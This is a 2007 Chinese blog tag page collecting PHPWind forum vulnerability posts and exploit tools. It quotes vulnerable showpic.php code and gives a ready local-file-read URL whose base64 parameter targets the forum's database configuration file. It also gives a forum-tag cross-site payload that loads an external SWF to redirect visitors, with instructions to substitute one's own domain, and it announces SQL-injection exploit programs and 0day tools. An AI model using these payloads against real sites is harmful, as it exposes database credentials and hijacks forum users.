标签 ‘PHPWind’ 下的日志

PhpWind 防盗链插件Showpic.php本地读文件漏洞

2007/05/11 7:04 | 鬼仔 | 技术文章 | 1 个回复

信息来源:H4x0r's Blog

漏洞文件:
showpic.php

str=$_SERVER['QUERY_STRING'];
$img=base64_decode($str);
$codelen=strlen($safeguard);//获取附加码长度
$img=substr($img,$codelen); //去掉附加码
readfile($img);

提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后提交,以读出文件内容

漏洞利用方式:

http://bbs.xxx.com/showpic.php?ZGF0YS9zcWxfY29uZmlnLnBocA==

然后查看源文件。

这里的ZGF0YS9zcWxfY29uZmlnLnBocA== 阅读全文 »

Tags: ,

phpwind 5.0.1 Sql注射漏洞利用程序

2007/04/25 7:21 | 鬼仔 | 工具收集 | 消灭0回复

来源:寒水芊芊's blog
阅读全文 »

Tags: , ,

phpwind5.x passport_client.php UPDATE SQL Injection POC

2007/04/09 7:10 | 鬼仔 | 工具收集 | 1 个回复

by Superhei
Date: 2007-04-08
http://www.ph4nt0m.org
阅读全文 »

Tags: , ,

关于phpwind 5.01-5.3 0day的分析

2007/04/07 11:00 | 鬼仔 | 技术文章 | 2 个回复

by superhei
2007-04-07
http://www.ph4nt0m.org

今天要luoluo牛抓了下包,这个漏洞挺牛的 :)
passport_client.php 里变量没有初始化可以绕过那些判断:
阅读全文 »

Tags:

[0day] PHPWind 5.x Exploits GUI版+命令行版

2007/04/06 3:57 | 鬼仔 | 工具收集 | 消灭0回复

来源:Neeao's Blog

-----------------------------------------------------------------
| PHPWind 5.x Exploits |
| |
| Powered by HamFast V1.12 20070101 |
| |

阅读全文 »

Tags: ,

跨站通杀漏洞:支持最新的phpwind等论坛.

2007/03/28 8:51 | 鬼仔 | 技术文章 | 消灭0回复

信息来源:黑色技术小组
整理编辑:B.S.T

只要把后面的域名改成你所要跳转的域名就可以了...
支持wmv的论坛如下发帖:

[wmv=314,256,1]http://www.rootkit.com.cn/qq.swf?url=http://www.rootkit.com.cn[/wmv]

其他论坛跨站方法大家自己灵活运用了....
比如 mp3 wmv flash rm 等代码的支持格式都可以试一下

Tags: ,